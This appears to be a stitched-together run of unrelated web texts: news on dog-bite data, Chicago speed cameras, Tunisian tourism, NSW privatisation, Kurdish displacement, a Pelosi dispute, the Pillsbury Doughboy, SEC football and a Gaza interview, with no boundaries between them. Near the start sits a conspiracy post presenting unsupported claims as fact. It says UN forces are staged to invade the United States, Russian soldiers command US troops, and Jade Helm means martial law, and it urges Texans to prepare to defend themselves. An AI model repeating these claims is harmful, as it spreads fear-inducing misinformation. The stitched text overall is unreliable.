If a biting victim goes to a doctor for a bite, the statistic goes to public health. If the victim calls animal services or tries to press charges against the owner, it gets reported by animal services. If the victim does both, the bite is recorded by both departments.
West of Toronto, in Mississauga, not all of the data has been digitized. To access it, workers need to dig through boxes of paper documents.
And so across the province, data is hard to come by, and what little information exists is unreliable since dog bites are often self-reported. It's impossible to know how many people have been bitten by pit bulls or other dogs in the province and have failed to report it to authorities.
"It's very challenging," said Leslie Irvine, who teaches human-animal interaction as it relates to sociology at the University of Colorado.
"The statistical reliability is always questionable. The sample sizes are small. The validity of the measures are questionable."
Irvine has written numerous books and studies about the role animals play in society, and says she often has trouble finding reputable data.
The lack of information on dog bites makes it difficult to create evidence-based policy, a topic that's particularly relevant now as both Montreal and Brossard, Que., move forward with their own plans to ban pit bulls.
"It's next to impossible to make good policy without evidence," said Erich Hartmann, who works at the Mowat Centre, a University of Toronto-based public policy think tank.
People are often affected by anecdotes rather than data, he said.
"Having a human face on a problem often can be a catalyst for action," he said, adding it's more powerful than "a wall of numbers and data."
"One hopes the anecdote isn't overly influential in forming the response to it," he said.
When the Ontario ban was announced in 2005, then-attorney general Michael Bryant spoke anecdotally.
"Testimony from victims was riveting and inspiring," he said at the time. "I don't want to have in Ontario one more victim at the hands and teeth of a pit bull."
The ban was was the result of an incident in which a Toronto man was "practically eaten alive from the ankles up," Bryant said. Police fired more than a dozen bullets to fell the two pit bulls.
But once Ontario's legislation passed, the province had no way to evaluate its effectiveness at reducing dog attacks.
Hartmann said oversight is a critical part of the policy-making process.
Among the questions legislators should ask themselves, he said, are: "How are we monitoring the success of what it is that we're doing? What data are we collecting and how does that help us measure whether or not we're achieving our objectives?"
They should also determine whether they need to "course-correct" and amend legislation after it's been passed, he added.
Connected Dots Reveal that UN Military Forces Are Now Prepared to Invade the United States
Yesterday, and despite being a speed reader, I spent almost three hours reviewing a mountain of material that I have been sent by people from around the country. About halfway through my review, I had an epiphany. I began to see the interconnections between events unlike I have ever seen before.
Previously, some of the material stood out as stand alone information. However, as I moved from one item to another, I began to connect the dots like I have never done before. Please allow me to provide for you the dot connections followed by a comprehensive analysis of what is coming in a more precise manner than I have previously reported.
DOT CONNECTION #1: Secretary of State, John Kerry, Signs the UN Small Arms Treaty In Violation of the US Constitution
The above photo of Kerry signing the UN Small Arms Treaty reminds me of Neville Chamberlain's infamous quote about having “peace in our time” after he signed the Munich Accords with Hitler just prior to World War II. Inside of these “accords” contained the seeds for World War II. Inside this UN treaty lies the destruction of American culture and society as we have known it.
The clear intent of President Obama's administration to disarm the American people should be very concerning to all Americans who know and appreciate their knowledge of world history. According to the University of Hawaii's Democide Project, there were 19 genocides in the 20th Century. Everyone of them was preceded by gun confiscation. President Obama is a Harvard man and, as such, should we not assume that the President has some working knowledge about this aspect of history.
DOT CONNECTION #2: Humvee Vehicles Needed to Fix Walmart Plumbing Issues
UN Vehicles Being Transported to Texas
The following video shows Humvee vehicles in a Texas Walmart. Additionally, UN vehicles have been photographed as they are being shipped into Texas. Texans, prepare to defend yourselves!
The following video presents the aforementioned information beginning 5 minutes into the presentation.
This action commenced in April of 2015 and continues through today. In fact, The Common Sense Show has been reporting on the sightings of UN military vehicles in this country, in significant numbers, for longer than a year.
DOT CONNECTION #3: The American Military Is Being Systematically Being Disarmed
Not only does the Obama administration plan to disarm the people of America, they are systematically disarming the military as well while, at the same time, beefing up the foreign troop presence on United States soil.
As UN vehicles continue to deploy into the United States, we are witnessing the systematic disarming of the American Military. DAHBOO 777 first published the following account of the American military disarming itself by putting what everyone thought was excess military equipment into mothballs at underground munitions storage areas such as the one featured below at the Red River facility. The reason that it is quite clear that this is a disarming is that if a rapid deployment of this equipment were ever needed in time of war, the grid lock that would result at a facility like this or any other storage facility constructed in this manner, would prevent the timely and proper deployment of men and equipment.
DOT CONNECTION #4: We Now Have the Lens of Historical Perspective
DAHBOO 777 first published the above featured video on March 2, 2015. At the time, I wasn't initially that suspicious of this activity. We were reducing our military operating size in the Middle East and subsequently, at the time, this seemed like an outgrowth of this activity. Please keep in mind this video was published almost a full month before the public revelation of Jade Helm 15.
The first time that most had heard of Jade Helm is when the following photos were released from a March 27, 2015 Ft. Lauderdale Special Operations Forces dissident extraction drill in which the following photos were captured by concerned local citizens.
The the country was quickly introduced to Jade Helm maps and the infamous and mysterious logo.
There is a reason why Obama is downsizing the military at a time when we are facing the strong possibility of going to war with China and Russia. This action by Obama is highly suspicious. Further, the military movement of equipment in this country is unprecedented and has been covered, in detail, on this site for the past six months.
The strategy seems clear: Reduce the size of the military, disarm much of the military as we see with Red River and as you will take note of in the next section, there is a growing foreign troop presence that is very well documented. Further, these events have caused me to view Jade Helm in, yet, another light. What Jade Helm also accomplishes besides dissident extraction and the implementation of martial law, is the mobilization and control of most of our domestically based military under one central authority, Jade Helm. If I wanted to neutralize the American military prior to a take over, this is exactly what I would do.
DOT CONNECTION#5:
THE CONTINUING AND INCREASING FOREIGN TROOP PRESENCE IN AMERICA
On August 29, 2015, I received a very disturbing email from a reader.
Dave, My son-in-law is a wild land firefighter based in Chelan, WA. As I'm sure you are aware the fires in Washington are some of the worst in the nation right now. I spoke with him last night after he came off of a 20 day shift. He has been battling the Wolverine fire which lies in a very remote part of the county only accessible by Boat or Helicopter. This is the same remote area that the U.S. Army Airborne division has been using to practice helicopter mountain training. (https://www.wenatcheeworld. com/news/2015/jul/06/army- considers-helicopter-training- in-ncw/) While battling the fire and establishing fie lines around Holden Village, he and his crew came upon two Blackhawk helicopters on the ground in a remote part of the forest. He said that soldiers drew their weapons on his US Forest service fire crew and told them they couldn't be in the area because it was a restricted Military zone. He said all of the soldiers were in US Army uniforms, but two of them appeared to be Russian (wearing US Army uniforms) and in his opinion the Russian soldiers seemed to be in charge. My son-in-law challenged the soldiers stating they were there to save structures threatened by the fire and they would continue to do their job, at which point all the rifles in the company pointed at him. At this point he said he actually felt threatened for his life and he and his crew retreated going around the helicopter crew. This led to a discussion as to whether or not the US Army had been involved in possibly starting the fires which now burn approximately 135,000 acres. Please withhold my name for obvious reasons.
This is not the only time we have seen, or heard of Russian troops in places where they should not be. As far back as 2011, Sherrie Wilcox sent to me a video of Russian soldiers training inside of DHS vehicles.
To one more of hundreds of documented incidents of this type, here are pictures of Russian commandos at Ft. Carson.
Please allow me to remind the readers that Steve Quayle, Doug Hagmann and myself have been on the front line warning about these events over the past several years. And through Agenda 21, America will soon lose control over 90% of its land as depicted below in a biodiversity map. Agenda 21 is synonymous with the United Nations.
The Impetus for the Take Over of the United States
All of these connected dots will coalesce along the lines of a catastrophe which would legitimize the use of UN aid in the form of blue-helmeted troops and their military equipment which is already being stored on US soil.
Most people would point to a false flag which would be needed to set the take over into motion. However, I do not think that a false flag will be needed. All the globalists have to do is let nature
take its course and let the economy collapse and the ensuing chaos would provide the backdrop to justify the placement of UN troops on the street. And these UN troops would be a buffer against a military that may not cooperate with the give away of the country by the current President.
DHS tipped its hand about the direction this was going several years ago when they acquired 2700 armored vehicles and over two billion rounds of ammunition. And let's not forget that DHS has not only acquired ammunition and armored vehicles, they have been practicing. And who have they been practicing for? You are not going to like the answer to this question as depicted in the above target shooting poster created by DHS.
Chicago School Zone Speed Cams Tag Drivers Even In The Summer, Because Chicago
from the gimmie-gimmie-gimmie dept
Well, this is fun. We just recently wrote about how Chicago's speed cameras, ostensibly all to do with safety, failed to bring in as much money as Mayor Rahm Emanuel had suggested in his budget plan. Yes, tickets based on speed cameras were worked into the budget numbers, which is a strange thing to do if they're supposed to be about safety and not money. Safe driving, in other words, should not trigger a budget crisis. But it turns out the ticketing revenue might still be inflated, even at the crisis number, as a bunch of speeding tickets were generated by cameras within school zones flagging drivers for driving over the school zone limit in the summertime.
Kenneth Maschek, the lead plaintiff in the lawsuit filed in circuit court Friday, says he was issued a $100 fine for speeding near Lane Tech College Prep High School on June 26, 2014. A speed camera, or Automated Speed Enforcement system, captured alleged violation, but the school year ended on June 10, Maschek claims. His was one of more than 34,000 violations that Chicago issued over summer break this year, from July 1 to September 1, according to the lawsuit. Maschek says the law is meant to keep the areas around schools, statutorily defined as one-eighth of a mile, safe for the children attending them.
The city's website states that school safety zones are in effect from 7 a.m. to 7 p.m. on school days, reducing speed to 20 mph until 4 p.m. and 30 mph after that. Maschek who cites the page and related press releases in his lawsuit, notes that signs posted near the zones also say the speed reduction applies "on school days when children are present." Residents of Chicago "routinely drive through school safety zones on an ongoing basis," leaving them constantly vulnerable to speeding tickets when the reduced speed should not be in effect, the complaint states.
We appear to be doubling up on claiming that revenue-generating laws are all about safety. In this case, speed cameras ticketed drivers for driving over limits intended to protect children when there were no children present. In case you were wondering, state law specifically prohibits issuing citations for driving over school zone limits except on "school days." This resulted inin revenue that never should have been generated.I expect that the city will mumble something about summer school and blah blah blah, because that's what we do in my home city. When confronted with a clear mistake or inequity, we look it straight in the eye and pretend it doesn't exist. It's sort of a municipal past time around these parts. Hopefully the courts will see through any push back. Either way, the claim that speed cameras have anything to do with safety should be over and done with.
Filed Under: chicago, kenneth maschek, money, revenue, school zones, speed camera, summer
Tunisia – The Tunisian Ministry of Tourism is preparing to launch campaigns to promote tourism in most European markets by the end of June 2017, with a budget of 23.7 Million Dinars (MD) (approximately $9 million).
A presentation on the preparations for the tourist season 2017 presented at a Cabinet meeting held on May 19, stated that the promotion campaign was organized on the Algerian market, during the first ten days of May with a budget of one million dinars.
The data provided by the Tunisian Ministry of Tourism showed an organization of 40 visits for 187 journalists and 31 prospecting visits for 1,128 representatives of travel agencies to promote Tunisian tourism in Russia, Poland and the markets of the Arabian Gulf (Sultanate of Oman, Saudi Arabia, the United Arab Emirates, Qatar and Jordan).
An estimated budget of 950 thousand dinars was also allocated to the domestic tourism promotion campaign for the year 2017, in addition to participation in 69 fairs in various tourist markets in the first quarter of 2017.
An estimated amount of about five million of the Tourism Competitiveness Development Fund has been allocated to the air transport support program for the year 2017.
In regard of the inspection of the quality and safety of tourism units, 3,332 inspection visits were recorded in the first quarter of 2017, up to 32 percent compared to the same period in 2016.
During the cabinet meeting, emphasis was placed on the importance of ensuring the success of the tourist season, including in particular increasing the number of security patrols, especially on beaches, souks and cities.
Data showed that about one million 725 thousand tourists visited the country between January and May 10, 2017, compared to one million 260 thousand tourists during the same period in 2016, up to 37 percent, according to data on preparations for the current tourist season presented at the May 19 Cabinet meeting.
Tunisia remains the first destination of Algerian tourists, according to the same source.
Around 568.3 thousand Algerian tourists entered Tunisia during the period, up to 67.3 percent followed by Libyans.
As for tourists from Europe, their number has increased by 31 percent. The French remain the first European tourists to visit Tunisia with 137,000 tourists against 95,800 in 2016, with an increase of 43.7 percent.
The Germans came second, followed by the Italians.
NSW Premier Mike Baird admits his job is on the line over planned electricity privatisation
Updated
New South Wales Premier Mike Baird says he is prepared to lose his job over the issue of electricity privatisation, which has again dominated state politics.
Mr Baird spent today spruiking projects that would be funded by money from the long-term lease of 49 per cent of the state's poles and wires.
But polls show fewer than one in four voters support the plan and concerns about privatisation in Queensland resulted in a change of government there this month.
Mr Baird has told Fairfax radio he is aware of the risks in proceeding with the policy into the March 28 state election, but will not back down.
"This is a once in a generation opportunity. I believe in it," he said.
"My job is to convince the people of New South Wales over the next 38 days of it but it is something that I'm prepared to lose my job over because I believe in it so passionately and know the difference it can make to people's lives."
Earlier today, Mr Baird announced that $300 million of the privatisation proceeds would be spent reducing gridlock on the state's roads.
There'll be minutes saved at each congestion point, which means commuting - whether it be getting to work and back, whether it be getting to sport and back, or whether it be getting back to your family - is done in a quicker time. NSW Premier Mike Baird
The money would target 32 trouble spots including stretches of the Pacific Highway, Parramatta Road, Old Windsor Road and Campbelltown Road.
The Government has previously committed $264 million over five years to the problem, but a spokesman has confirmed the funding announced today is new.
Mr Baird said travel times would be reduced as a result.
"There'll be minutes saved at each congestion point, which means commuting - whether it be getting to work and back, whether it be getting to sport and back, or whether it be getting back to your family - is done in a quicker time."
Labor said it would release a fully costed, infrastructure policy tomorrow and insisted it would not pay for road or other infrastructure upgrades by selling off assets.
Deputy Opposition leader Linda Burney said the public would not accept the Government's latest deal.
"How dare the Premier or anyone in his Government holds an axe over the head of people who want to get a new school, or want to fix up an intersection, or want to sort out a pinch point in traffic," she said.
Senate inquiry a 'stunt', Baird says
Earlier, Mr Baird defended a decision not to appear before a Senate inquiry into a proposed Federal Government scheme promoting privatisations.
The $5 billion asset recycling scheme was included in last year's federal budget to encourage sales of public assets by recompensing states for tax lost through privatisation.
Labor senator Sam Dastyari called Mr Baird a "coward" and accused him of trying to avoid scrutiny of his plan to privatise the electricity network.
Mr Dastyari said Mr Baird should have attended today's hearing in Sydney because he originally came up with the idea for the scheme.
"Mike Baird took the idea of asset recycling to Canberra but he won't man up in his own city, in his own state and make the case," he said.
Mr Baird dismissed Mr Dastyari's criticism.
"It's not going to surprise you. I'm not going to participate in Labor stunts," he said.
Topics: states-and-territories, urban-development-and-planning, road-transport, electricity-energy-and-utilities, privatisation-and-deregulation, nsw, sydney-2000
First posted
SULAYMAIYAH — After the invasion of the Kurdish disputed territories by the Iran-backed militias of Hashd al-Shaabi, over 100,000 people fled their areas or were driven out of their homes by the militias.
After the invasion of Tuz Khurmatu city by the Shi'ite militias, thousands of people, predominantly Kurdish civilians, were driven out of their homes by the armed Shi'ite militias.
The United Nations voiced concern about the reports regarding the destruction and looting of houses, businesses, and political offices, and forced displacement of civilians from the disputed areas.
The United Nations said it has received reports of the burning of about 150 houses in Tuz Khurmatu, south of Kirkuk, on 16 and 17 October, by the armed groups of Hashd al-Shaabi.
The displaced civilians from Tuz Khurmatu are now leading an adverse life in camps in Sulaymaniyah Province.
Hadi Mohamad, a civilian in Surdash camp in Sulaymaniyah, told BasNews “When Tuz Khurmatu was taken over, we could only save our lives, we could not bring with us food, clothes or other needs.”
On October 16, Hashd al-Shaabi and Iraqi forces launched a major offensive, using US-provided weapons, against Peshmerga forces in Kurdish disputed areas.
With the possible exception of columns on the correct way to hang toilet paper (tail dangling from the back) and the correct way to make a peanut butter-and-jelly sandwich (spread peanut butter first), nothing I've written has garnered as much reaction as last's week column about the UFO press conference I attended.
The e-mail has not been kind.
"Were you always a fool?" wrote Gabe. "Or did you recently just become one?"
Someone who signed his message "A friend" wrote: "You smug, shallow, myopic [expletive]. I grew up in Wyoming and have personally seen UFOs. They are quite real. Do some research and stop being a skeptical windbag. You know nothing."
That was nice compared with what Anders had to say: "You are a cynical, uninformed and slow person. You should not be so keen to 'dis' people's versions of events such as these, especially when you are coming off as a smug, self-satisfied plumper who only likes to make light fun of things he refuses to entertain in his little brain (and probably told to generally dismiss by his bosses), whilst stuffing his pudgy little face with trans-fats.
"Enjoy your sleep, corporate clown."
I really must change that photo of me on the Web site.
Some readers had more specific complaints - about my writing, as opposed to my face. Wrote Connie: "Why are you clowning around in your reporting when U.S. Air Force officers who were in charge of ICBMs - perhaps the most serious responsibility in the world - explain that UFOs hovering right above the missiles (not just 'lights in the sky') caused total system failures?"
A reader from Castro Valley, Calif., mused: "Maybe the DOD found out something a long time ago that scared the hell out of them and they figured that 'in the name of national security' they would cover it up because the American public could not handle it. And when they did figure out what the hell was going on they decided to keep it to themselves. Don't you think the American public has the right to decide what they can handle and what they can't?"
He predicted: "When the truth really comes out about how the military and others have lied to the American public for over the past 60 years about the existence of ETs, the members of the press, like yourself, will be asking themselves, 'Where were we all this time?' "
Me? Stuffing my face with trans fats.
Steve wrote: "Hell, we certainly believed the government with far less 'evidence' (George Bush WMDs, Colin Powell presenting 'evidence' at the UN)."
A top Democratic aide warned Thursday that Rep. Linda Sanchez's call for House Minority Leader Nancy Pelosi and her deputies to step aside would antagonize the Congressional Hispanic and Black Caucuses.
The aide called Sanchez's request "particularly craven" because it comes after the 77-year-old Pelosi, of California, managed to keep the caucus entirely unified against major GOP legislation, including a bill to repeal and replace Obamacare.
Her spokesman, Drew Hammill, said there is no threat the 194-member caucus will try to oust her.
"Leader Pelosi enjoys wide support in the caucus and has always said she not in Congress on a shift but on a mission," Hammill said. "Leader Pelosi is focused on winning back the House and anything else is a distraction from our path to the Majority."
The senior aide noted that Sanchez, who is caucus vice chair, was barely elected to the number-five leadership post. She won the spot in a race against Rep. Barbara Lee, D-Calif., by a 98-96 vote.
Sanchez is the youngest member of the leadership team. In addition to calling for Pelosi to step aside, Sanchez said Minority Whip Steny Hoyer, D-Md., who is 78, and Assistant Minority Leader James Clyburn, D-S.C., 77, should also quit the leadership.
Clyburn is a member of the Congressional Black Caucus.
Sanchez did not call on current Caucus Chairman Joseph Crowley, D-N.Y., 55, to step aside. He succeeded Xavier Becerra, D-Calif., who left Congress to become California Attorney General. He was a member of the Congressional Hispanic Caucus.
Poppin' Fresh, more widely known as the Pillsbury Doughboy, is an advertising mascot for the Pillsbury Company, appearing in many of their commercials. Many commercials from 1965 until 2005 (returned in 2009 to 2011 and 2013 in a GEICO Commercial, and once again in 2017) concluded with a human finger poking the Doughboy's stomach. The Doughboy responds when his stomach is poked by giggling (Hoo-Hoo!, or earlier on, a slight giggle "tee hee").
History [ edit ]
The Pillsbury Doughboy was created by Rudy Perz, a copywriter for Pillsbury's longtime advertising agency Leo Burnett.[2] Perz was sitting in his kitchen in the spring of 1965, under pressure to create an advertising campaign for Pillsbury's refrigerated dough product line (biscuits, dinner rolls, sweet rolls, and cookies). His copywriter, Carol H. Williams, imagined a living doughboy popping out of a Pillsbury Crescent Rolls can and wrote the campaign, "Say Hello to Poppin' Fresh Dough". Originally named "Jonathan Pillsbury,"[citation needed] the dough boy was given a scarf, a chef's hat, and two big blue eyes to distinguish him from the rolls, as well as a blush and a soft, warm chuckle when poked in the stomach. The Doughboy was originally designed by Milt Schaffer and brought to life using stop motion clay animation. Today, CGI is used. The first CGI commercial was broadcast in 1992 and was directed by Tim Johnson who at that time was working for PDI.
Perz originally conceived the Doughboy as an animated figure but changed his mind after seeing a stop motion titling technique used in the opening credits for The Dinah Shore Show. A three-dimensional Doughboy puppet was then created at a cost of $16,000. Voice actor Paul Frees was chosen to be Fresh's voice. Stop-motion animator George Pal was hired to animate him. The first Poppin' Fresh commercials aired in November 1965. Since then, Pillsbury has used Poppin' Fresh in more than 600 commercials for more than fifty of its products. He also appeared in a Mastercard commercial, with the Jolly Green Giant, the Morton Salt Girl, the Vlasic stork, and Count Chocula, as some of the ten merchandising icons, depicted as having dinner together. He even appears in ads for the Got Milk? ad campaign, the Sprint Phone Company, and the GEICO insurance company. He also made a cameo appearance in the 1987 claymation film The Puppetoon Movie.
After Frees' death in 1986, Jeff Bergman took over. Today, the high-pitched giggles are done by JoBe Cerny.[3]
Pillsbury family [ edit ]
In the 1970s, a Pillsbury Doughboy family was created and sold as dolls individually and in the form of various playsets.[4]
Included in the family are:
Poppin' Fresh [4]
Poppie Fresh (a.k.a. Mrs. Poppin' Fresh, Pillsbury Doughgirl). It is debated among collectors as to whether Poppie is Poppin's wife, girlfriend, or sister. [5] [4]
Granpopper and Granmommer (grandparents) [4]
Popper (boy) and Bun-Bun (baby, girl) [4]
Flapjack (dog) and Biscuit (cat) [4]
Uncle Rollie[4]
Trademark conflict [ edit ]
In May 2010, Pillsbury's lawyers served a cease and desist notice to My Dough Girl, LLC. a Salt Lake City, Utah Cookie Retailer.[6] Some reported that an attorney for General Mills instructed her not to talk to the press.[7]
Don't look now, but we're already through six weeks of college football. It'll be December before we know it. Here are the main takeaways from the week six:
A real player in the East: Florida is a serious contender for the SEC East. Knowing the Gators have the best defense in the SEC – and maybe the country, Florida only needs an efficient quarterback. Tyler Murphy is better than efficient. In fact, he's an impact player. Murphy connected on 16 of 22 passes for 240 yards and three TDs. Most importantly, Murphy had zero INTs. Jeff Driskel didn't throw for 240 yards in one game in 2012. Florida's defense yielded 120 yards in the first quarter against Arkansas; the Hogs mounted just 155 yards the rest of the game. The Gators have been waiting on a receiver to emerge, and he comes in the form of Solomon Patton, who caught six passes for 124 yards and two TDs. Florida is a serious player in the East behind Murphy and the conference's nastiest defense. The Gators have held 12 straight SEC opponents under 20 points or fewer.
Related: Florida-Arkansas highlights
So is Missouri: We just talked about Florida and the East; it's time to get serious about Missouri, too. So many were quick to discount how much they have improved because they hadn't played an SEC game yet. The Tigers trounced the Commodores 51-28, racking up 446 yards and their first real win. With the SEC trending more towards an offensive league in 2013, the Tigers are alive behind an explosive and balanced spread attack. QB James Franklin finished 19 of 28 for 278 yards and four TDs. Could Missouri sneak up and grab the SEC East? We'll find out how serious they are next week against Georgia in Athens. All of a sudden, this game is very interesting.
Related: Missouri-Vanderbilt highlights
Legacy, Attrition: Aaron Murray cemented his legacy with an epic 10-play, 75-yard drive that ended in a game-tying TD with five seconds left to send it into overtime. And Murray did it without RB Todd Gurley, RB Keith Marshall, WR Michael Bennett and WR Justin Scott-Wesley due to injuries. The Bulldogs ultimately won 34-31, but today's carnage report is going to be ugly. Marshall, Bennett and Scott-Wesley all went down with possible season-ending knee injuries. Murray is playing as well as anyone in college football, and he willed his team to victory once again. Was it a Heisman moment? This is a great reminder that winning on the road in the SEC is all about survival. All of a sudden, a bend-but-don't-break defense is going to have to step up and start winning football games for the hurting Bulldogs.
Related: Six takeaways from Georgia-Tennessee
Auburn is the faster riser: Two programs on the rise battled for the fastest riser, and the Tigers beat the Rebels 30-22. Hats off to Gus Malzahn this year, taking a 3-9 team and starting 4-1 and in real position to win nine games, depending on the track meet outcome against Texas A&M. The Tigers ran for 282 yards against the Rebels' defense, and Auburn's defense managed to get four second-half sacks, two INTs and 14 tackles for loss on the night. The defensive play was ultimately the difference. The Tigers are the faster riser than Ole Miss, who faces Texas A&M and LSU the next two weeks. The Rebels better get the offense moving or they're looking at four straight losses in the brutal four-game stretch. Auburn continues to head towards the SEC's biggest turnaround.
Related: Auburn-Ole Miss highlights
Complete game: Nick Saban had the perfect game for his team. He wanted an efficient and injury-free game while playing basically everyone on the roster, and he got that. There's not much to learn from a terrible Georgia State team, but Alabama's offense looked much more efficient. And it looks like the kinks along the O-line are getting worked out. AJ McCarron was nearly perfect, finishing 15 of 16 for 166 yards and four TDs, and his 93.8 completion percentage broke a school record. And the Tide may have found another star receiver in the making in backup Chris Black. He led the team with six catches for 54 yards and one TD in mop-up duty. WR Amari Cooper continues to be a non-factor, despite being a freshman All-American. Although it was just Georgia State, the offense didn't stumble and bumble like it did against Colorado State, and the offense can afford to improve over the next four weeks before LSU.
Related: Did you see DeAndrew White's one-handed catch? Amazing.
LSU's Air Attack: What Bo Wallace really meant was the LSU Tigers have better receivers than Texas A&M. In fact, the Tigers have the best air attack in college football. Behind the arm of an emerging Zach Mettenberger and star receivers Odell Beckham and Jarvis Landry, the Tigers have the most explosive passing game in the SEC. Yes, more explosive than Texas A&M. Mett finished 25 of 29 for 340 yards and two TDs, and he carved up the Bulldogs' secondary like it was 7-on-7 drill. Beckham caught nine for 179 yards and two TDs, while Landry caught eight for 96. The Tigers thumped Mississippi State 59-26, and they racked up 563 yards of total offense. Jeremy Hill carried 16 times for 157 yards and two TDs, and Kenny Hilliard carried for three TDs. This is the most balanced offensive attack in college football. Hat tip to Cam Cameron. But does anybody play defense anymore?
Related: LSU-MSU highlights
Warming up: Where does this leave Dan Mullen? He's gone from one of the hottest coaches in college football to just another head coach who has managed a 2-18 record against ranked opponents and 0-9 record against top 10 opponents. What will become of Mullen in Starkville? It seems he waited too long to take another job, and the only end game will be MSU firing him — whenever that may be. The Bulldogs will be favored in just two more games against Bowling Green and Kentucky, and best case scenario, the Bulldogs are looking at six wins, assuming they can win two swing games against Arkansas and Ole Miss. Six wins will certainly give Mullen another year and will be an accomplished feat considering the poor start, but winning just five will warm up the seat in a hurry.
Mailing it in: The biggest takeaway from South Carolina's squeaker against Kentucky was the fact that Jadeveon Clowney is mailing it in. Carolina beat Kentucky 35-28, and credit Kentucky for fighting hard on the road. Carolina has to find a way to put teams away. But Steve Spurrier made some candid comments after the game about Clowney, who didn't play because of a ‘rib' injury he let the coaches know about just before the game. “If he wants to play, we will welcome him to come play for the team if he wants,” Spurrier said about Clowney. Every week it's been something with Clowney, and he seems to be mailing it in; he's playing not to get injured. If only Clowney hadn't made ‘The Hit‘ in the Outback Bowl…
Related: South Carolina-Kentucky highlights
Cursed: Is Tennessee cursed? There's some strange Voodoo going on in Knoxville. The Vols have lost a game in every single way possible. The ‘too many men' debacle against LSU; the Music City Bowl debacle against UNC; and now, the fumble just an inch before to the goal line that resulted in a touchback and, ultimately, a Georgia win. Butch Jones needed that signature win, and Tennessee needed that game to keep their bowl chances alive. However, five wins are most likely at this point, and Tennessee has found a way to lose a game every possible way. But credit Butch Jones; he made some gutsy fourth-down calls and represents the future in Knoxville.
Photo Credit: Rob Foldy-USA TODAY Sports
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: “Outrageous” and “unjustifiable.” Those were the words used by the United Nations to condemn Israel after at least 20 Palestinian civilians died when a U.N. shelter was bombed in Gaza Wednesday. Many of the dead were children who were sleeping. U.N. Secretary-General Ban Ki-moon said all available evidence points to Israel being behind the attack. It was the sixth time a U.N. shelter had been bombed since the Israeli offensive in Gaza began 24 days ago. The U.N. said it had given the coordinates of the shelter to the Israeli military 17 times prior to the attack.
According to the United Nations, more than 240,000 Palestinians are now staying in U.N. shelters in Gaza. Another 200,000 Palestinians have been displaced and are staying with other families. Hours after the attack, Christopher Gunness, the spokesperson for the the United Nations Relief and Works Agency for Palestine Refugees, broke down during an interview with Al Jazeera.
CHRISTOPHER GUNNESS: The rights of Palestinians, even their children, are wholesale denied, and it's appalling.
AMY GOODMAN: Joining us now is Christopher Gunness, the spokesperson for the the United Nations Relief and Works Agency for Palestine Refugees, known as UNRWA. He's joining us via Democracy Now! video stream from Jerusalem.
Chris, welcome back to Democracy Now!
CHRISTOPHER GUNNESS: Thank you. Thank you very much.
AMY GOODMAN: Can you talk about what took place yesterday?
CHRISTOPHER GUNNESS: Well, we saw huge displacement in Gaza. There are now, in UNRWA facilities, 86 of them, nearly a quarter of a million people. And don't forget, these are people displaced because of the Israeli ground offensive, and according to international law, it's the belligerent parties in a conflict which are responsible for the humanitarian consequences, particularly towards civilians. So, UNRWA has reached great breaking point. And we are at the point where eight of our staff have been killed. Our facilities are overwhelmed. Because of the continued displacement and the fact that Israel has dropped leaflets, etc., from the sky and sent text messages, possibly thousands, tens of thousands, hundreds of thousands more are going to be displaced. We may soon find ourselves where there are tens of thousands of people in the streets of Gaza—no food, no water, no shelter, no safety, frankly, after we've found that Israeli artillery is capable of hitting our safe shelters.
And we're saying enough is enough. We cannot be expected to have an endless capacity to absorb the consequences of Israeli military decisions, and it is time that we acknowledge that we've moved beyond the realm of humanitarian action alone, and we have moved into the realm of political accountability and political action. Pierre Krahenbuhl, the Swiss national who is going to be briefing the Security Council from Gaza today—it promises to be a truly historic moment; it's at 5:00 Gaza time and is available live-streaming through the U.N. website—is going to tell the Security Council that we have reached breaking point, and it's up to others, with the political weight, to bring correct influence to bear on the parties. And we all know exactly which parties and which influences have to be brought to bear. It's time for them to do so, to end this conflict, because the guns need to fall silent. Enough blood has been spilled. And that moment of ceasefire, of permanent ceasefire, will not come soon enough for the embattled people of Gaza—and, by the way, for the six million civilians in Israel who have been terrorized by these appalling barrages of rockets that have been flying out.
AMY GOODMAN: Chris Gunness, how does the U.N. know that it was Israel that attacked the U.N. shelter, the school that the U.N. is using to house thousands of refugees?
CHRISTOPHER GUNNESS: Well, Amy, first of all, the word “attack” is not a word that we've used, because that implies deliberate intentionality, and that's not something we're saying. We're saying that an Israeli artillery shell struck the school, and there's a big difference there. Intentionality is the difference. We know that because we did crater analysis, we did trajectory analysis, we analyzed the debris, including fragments that were found at the scene. And we are confident enough in our initial findings to have gone public and to have made a very strong condemnation of the serious violation of international law by Israeli forces. I think the very fact that a humanitarian organization is making such an accusation against one of the most powerful armies in the world, and certainly in the Middle East, I think says something about how certain of our facts we are. But, you know, let's have a proper investigation. There must be accountability. There must be transparency and proper reporting. The truth will come out. And, you know, we hope that with truth, as is often the case, will come justice.
AMY GOODMAN: I want to turn to Mark Regev, the spokesperson for the Israeli prime minister, Benjamin Netanyahu, who was responding to the bombing of the U.N. school in an interview with CNN's Wolf Blitzer.
MARK REGEV: First of all, it's not clear to us that it was Israeli fire, even Israeli errant fire, that hit that U.N. facility. What we do know is that terrorists, Hamas terrorists, were shooting at our forces, and there was a firefight, and they were shooting at us from the immediate vicinity of that U.N. school. Now, if our forces are in the field and being shot at, right, it's only natural that they would return fire to save their own lives.
AMY GOODMAN: Israeli spokesperson Mark Regev also responded to the U.N.'s finding that it was in fact Israeli shells which hit the school.
MARK REGEV: First of all, we'll be interested to hear what they'll say, and we'll cooperate in investigations, if need be, because we'll be totally transparent. If it was our fault, if it was errant Israeli fire, then we will of course come clean. In the past, we have admitted when we've made mistakes. But let's be clear. Here, the secretary-general of the United Nations has been very clear. He said when terrorists put weapons or use a U.N. facility for their military purposes, they are responsible, because they are endangering the lives of everyone who uses that facility. And that was clear today, that our forces were taking fire from terrorists in the immediate vicinity of that school, therefore it's Hamas who has turned this area into a war zone, and they bear responsibility.
AMY GOODMAN: That's the Israeli spokesperson, Mark Regev. Christopher Gunness of the United Nations, can you respond?
CHRISTOPHER GUNNESS: Well, here are some questions for Mr. Regev. Do you not think that the self-described most moral army in the world, if it was going to attack—I mean, he seems to be saying that there were terrorists there, so Israel deliberately attacked. I think that's what I heard him say; I may be wrong. But if the most moral army in the world, as the Israeli army has called itself, feels that there's going to be an attack in which people are going to be killed, women and children, children who slept at their parents' side on the floor of a classroom in a U.N.-designated safe area, wouldn't it be sensible to allow the principle of distinction to take hold and for combatants and noncombatants to be distinguished and for women and children civilians to be allowed to leave the combat zone? And what about the notion of proportionality, the fact that you're attacking militants near an UNRWA compound, and the risk is that you kill women and children in large numbers? Isn't that something which the rules of war dictate that the Israeli army should be cognizant of?
